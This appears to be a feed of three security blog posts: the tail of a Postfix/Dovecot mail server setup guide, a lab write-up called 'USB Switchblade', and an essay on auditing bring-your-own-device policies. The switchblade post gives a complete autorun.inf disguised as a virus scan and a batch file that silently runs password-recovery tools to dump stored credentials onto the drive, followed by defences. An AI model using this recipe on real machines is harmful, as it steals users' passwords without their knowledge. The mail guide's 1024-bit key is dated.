local_recipient_maps = unix:passwd.byname $alias_maps

# line 268: uncomment and specify your LAN (in our case its 192.168.1.0/24)

mynetworks = 127.0.0.0/8, 192.168.1.0/24

# line 388: uncomment

alias_maps = hash:/etc/aliases

# line 399: uncomment

alias_database = hash:/etc/aliases

# line 421: uncomment (use Maildir)

home_mailbox = Maildir/

# line 526: uncomment

header_checks = regexp:/etc/postfix/header_checks

# add: mail body checking

body_checks = regexp:/etc/postfix/body_checks

# line 552: comment out and add

# smtpd_banner = $myhostname ESMTP $mail_name (@@DISTRO@@)

smtpd_banner = $myhostname ESMTP

# line 626: add

sendmail_path = /usr/sbin/postfix

# line 631: add

newaliases_path = /usr/bin/newaliases

# line 636: add

mailq_path = /usr/bin/mailq

# line 642: add

setgid_group = postdrop

# line 646: comment out

#html_directory =

# line 650: comment out

#manpage_directory =

# line 655: comment out

#sample_directory =

# line 659: comment out with #

#readme_directory =

# If you want to limit email and mailbox size, add this to the end of file (my example uses 10Mb & 1GB)

message_size_limit = 10485760

mailbox_size_limit = 1073741824

# for SMTP-Auth settings add to the end of the config file:

smtpd_sasl_type = dovecot
smtpd_sasl_path = private/auth-client
smtpd_sasl_auth_enable = yes
smtpd_sasl_security_options = noanonymous
smtpd_sasl_local_domain = $myhostname
smtpd_client_restrictions = permit_mynetworks,reject_unknown_client,permit
smtpd_recipient_restrictions = permit_mynetworks,permit_auth_destination,permit_sasl_authenticated,reject

# add the following to the end of the file for SSL:

smtpd_use_tls = yes
smtpd_tls_cert_file = /etc/ssl/certs/server.crt
smtpd_tls_key_file = /etc/ssl/certs/server.key
smtpd_tls_session_cache_database = btree:${data_directory}/smtpd_scache

Step 3. Header and body checks:

root@mail:~# sudo vi /etc/postfix/header_checks

# add at the top (reject if email address is empty )

/^From:.*<#.*@.*>/ REJECT

/^Return-Path:.*<#.*@.*>/ REJECT

root@mail:~# sudo vi /etc/postfix/body_checks

# reject if an email includes ‘example.com’ in mail body – blacklist

/^(|[^>].*)example.com/ REJECT

root@mail:~# sudo newaliases

root@mail:~# sudo /etc/init.d/postfix restart

Linux Email Server Dovecot setup

root@mail:~# sudo apt-get install dovecot-common dovecot-pop3d dovecot-imapd

root@mail:~# sudo vi/etc/dovecot/dovecot.conf

# line 53: uncomment

disable_plaintext_auth = yes

# line 95: uncomment for SSL

ssl = yes

# line 230: uncomment and add

mail_location = maildir:~/Maildir

# line 893: add

mechanisms = plain login

# line 1120: modify: (uncomment socket listen and client section)

socket listen {

#master {

# Master socket provides access to userdb information. It’s typically

# used to give Dovecot’s local delivery agent access to userdb so it

# can find mailbox locations.

#path = /var/run/dovecot/auth-master

#mode = 0600

# Default user/group is the one who started dovecot-auth (root)

#user =

#group =

#}

client {

# The client socket is generally safe to export to everyone. Typical use

# is to export it to your SMTP server so it can do SMTP AUTH lookups

# using it.

path = /var/spool/postfix/private/auth-client   # uncomment and change

mode = 0660 # uncomment

user = postfix # add this

group = postfix # add this

}

}

# line 100,101: uncomment and specify certificate

ssl_cert_file = /etc/ssl/certs/server.crt
ssl_key_file = /etc/ssl/certs/server.key

root@mail:~# /etc/init.d/postfix restart

Stopping Postfix Mail Transport Agent: postfix.

Starting Postfix Mail Transport Agent: postfix.

root@mail:~# sudo /etc/init.d/dovecot restart

Linux Email Server Advance Guide SSL Setup

Step 1: Create SSL Certificate (We will create our own since this is internal)

user@debbie:~# cd /etc/ssl/certs
user@debbie:/etc/ssl/certs# sudo openssl genrsa –des3 –out server.key 1024

#After the following command, don’t enter a passphrase, just hit enter enter. We do this to remove the passphrase. It is not required.

user@debbie:/etc/ssl/certs# sudo openssl rsa –in server.key –out server.key

user@debbie:/etc/ssl/certs# sudo openssl req –new –days 3650 –key server.key –out server.csr

#You can use defaults for the next  5 options, BUT at option 6 you MUST use your servers FQDN (hostname –fqdn). In the case of this example it would be debian.lonestar.com

You can then accept defaults for the rest of the options if you’d like.

user@debbie:/etc/ssl/certs# sudo openssl x509 –in server.csr –out server.crt –req –signkey server.key –days 3000

#allow owner to read all keys:

user@debbie:/etc/ssl/certs# sudo chmod 400 server.*

cd ~

Step 2: Configuring postfis master file

user@debbie:~# sudo vi /etc/postfix/master.cf

# line 17-18: uncomment

smtps       inet   n       -       n       -       -       smtpd

-o smtpd_tls_wrappermode=yes

root@mail:~# sudo vi /etc/dovecot/dovecot.conf

Testing Linux Email Server Advance Guide with Thunderbird:

If your machine with thunderbird is on a different host, you will need to add the appropriate hostfile/DNS entry for thunderbird to be able to find your linux server on the network.

In this example our workstation is a Windows 7 box with thunderbird installed, edit the hosts file to add this line:

(IP of server)        (FQDN of server)

192.168.1.120      debian.lonestar.com

I’ve included the main.cf and master.cf files I used for postfix in this  Linux Email Server Advance Guide walkthrough.

https://www.mafiasecurity.com/guides/email/main.cf
https://www.mafiasecurity.com/guides/email/master.cf

Sources referenced for Linux Email Server Advance Guide:

http://www.server-world.info/en/note?os=Debian_6.0&p=mail
http://library.linode.com/email/postfix/dovecot-system-users-debian-6-squeeze#sph_organize-mail-services
https://syslog.tv/2011/09/15/postfix-dovecot-imapimaps-sasl-maildir/

The post Linux Email Server Advance Guide appeared first on Mafia Security.

All that was needed to for this lab is a spare USB flash drive. Another part to making this lab work is a basic understanding of Microsoft Batch scripting. Does not need specific space requirements, the executable files that are needed MessenPass, Mail PassView, IE Passview, Protected Storage PassView, and PasswordFox are all easily accessible on the internet and no credential authentication required to download these files.

MessenPass, Mail PassView, IE Passview, Protected Storage PassView, and PasswordFox are all password recovery tools used to recover passwords. MessenPass can recover MSN Messenger, Windows Live Messenger, Yahoo Messenger, Google Talk etc… Mail PassView can get passwords for Outlook Express, Outlook 2000, Outlook 02/03/07/10, Windows Mail, Windows Live Mail, etc… IE Passview shows the passwords stored by Internet Explorer web browser that a user has log on information on. It captures web-address, username, and password information. Protected Storage Passview can reveal passwords stored by Internet Explorer, Outlook Express, and MSN Explorer about any Protected Storage. The information about a Protected Storage program or device is stored in the registry, under “HKEY_CURRENT_USER\Software\Microsoft\Protected Storage System Provider”. PasswordFox can retrieve user names and passwords stored by Mozilla Firefox such as Record Index, Web Site, User Name, Password, etc… This program goes to where ever Firefox is installed on the computer, loads the admin profile and takes any information in the account. For any of these tools, if the programs aren’t installed on the local machine then nothing will come back in the txt file.

Example of Switchblade working; for this to work you’ll need a flash drive, and the nessesary exe files mention above. In the USB drive, create a note pad document with the following information and then save it as autorun.inf.

open=launch.bat

ACTION= Perform a Virus Scan

Once that is done copy and paste MessenPass, Mail PassView, IE Passview, Protected Storage PassView, and PasswordFox exe files to the flash drive. Then create a second notepad document and input the following. Then save as launch.bat

start mspass.exe /stext mspass.txt

start mailpv.exe /stext mailpv.txt

start iepv.exe /stext iepv.txt

start pspv.exe /stext pspv.txt

start passwordfox.exe /stext passwordfox.txt

What this does is when the USB drive is plugged in to the computer; the auto run.inf will pop up and ask if you want to do a virus scan. Shown in Figure 1.

usb switchblade

(Figure 1)

If the user clicks on “Perform a Virus Scan”, it will then load the “launch.bat” file and run all the executables in the script. Once the script has ran, any information will be displayed in the text files where it was created. Show in Figure 2 are the results of the program being ran on a computer with Administrative Privileges. The Password and Login information are blocked out to protect the user.

usb switchblade

(Figure 2)

The ways to defend against this kind of physical attack; one disable the autorun feature in Windows, this will help the accidental execution of programs from foreign flash drives. Second, on certain high profile computers/servers disable USB function this will not allow USB devices to be connected to a computer. The third is distributing USB Flash drives in a corporate environment that were purchased by the company for the employees to use.

The post USB Switchblade appeared first on Mafia Security.

According to Navetta (2012):
“One of the assumptions often reflected in conversations about Bring Your Own Device BYOD is that the organization has the luxury of creating a BYOD strategy based on a blank slate. The reality, however, is that the BYOD genie is already out of the bottle for many organizations. A recent survey of organizations conducted by found that 95% of surveyed organizations were permitting employees to use their own devices in some form in the workplace. According to the same study, each connected worker will have as many as three devices connected to employer networks by 2014.”

The most interesting fact about Bring Your Own Device is the Information Technology departments used to drive new technology into the business; although, with the release of the iPhone the new technology implementation shifted from the technology departments to the employees within the organization (Bradley, 2011).

Pros for Bring Your Own Device Auditing:

Any type of business entity, which embraces Bring Your Own Device  BYOD, has advantages over competitors such as shifting the bulk of the cost to the employee with them paying for all of the costs for hardware and voice/data services – as much as $90 per month per user (Bradley, 2011). Intel did an interesting study, which showed:

According to Gruman (2012):
About $150 million a year in increased productivity (57 extra minutes per day at Intel per BYOD employee) and cost savings, she says. Intel gets $3 in return for every $1 invested in supporting consumerization. By my calculations, that means a return of about $7,500 per BYOD employee for a cost of $2,500 per employee to enable, manage, and secure.

Cons for Bring Your Own Device Auditing:

Bring your own or bring your own disaster (BOYD), can be very difficult from both an operational and policy governance standpoint. There are many hidden costs associated with BOYD such as management software, employee behavior, expense reporting, and training (Kaneshige, 2012). There are many security reasons why not to allow BYOD; however, the mistake many entities will make is their mobile device policy verse personal device policies and being able to enforce it without disastrous events from employees where company information on the personal device caused harm physically or logically to their personal device.

Bring Your Own Device Auditing:

Policies often indicate the entity has every right to monitor personal device use while connected to the company network, on the device itself and the transmission of any data from that device (Navetta, 2012). Of course, personal device use policies should include a notice any information on their device may be accessed or viewed by the company, especially in the context of security incident situations and investigations, audits, and litigation (Navetta, 2012).

It would be best if IT auditors had an advisory role when either legal and/or the information security department create the policies and compliance for these personal devices. In addition, if information, which would be normally audited, accesses or is stored on the personal device, the employee must allow the IT auditor to audit the personal device.

References for Bring Your Own Device Auditing

Antonopoulos, A. (2011, July 27). IT security’s scariest acronym: BYOD, bring your own device. Retrieved January 28, 2013, from Network World website: http://www.networkworld.com/columnists/2011/072711-andreas.html

Bradley, T. (2011, December 20). Pros and Cons of Bringing Your Own Device to Work. Retrieved January 28, 2013, from PCWorld website: http://www.pcworld.com/article/246760/pros_and_cons_of_byod_bring_your_own_device_.html

Gruman, G. (2012, October 12). Afraid of BYOD? Intel shows a better way. Retrieved January 28, 2013, from InfoWorld website: http://www.infoworld.com/d/consumerization-of-it/afraid-of-byod-intel-shows-better-way-204123

Kaneshige, T. (2012, December 13). BYOD Planning and Costs: Everything You Need to Know. Retrieved January 28, 2013, from http://www.cio.com/article/723864/BYOD_Planning_and_Costs_Everything_You_Need_to_Know

Navetta, D., Esq. (2012). The Legal Implications of BYOD: Preparing Personal Device Use Policies. ISSA Journal, 10(11).

The post Bring Your Own Device Auditing appeared first on Mafia Security.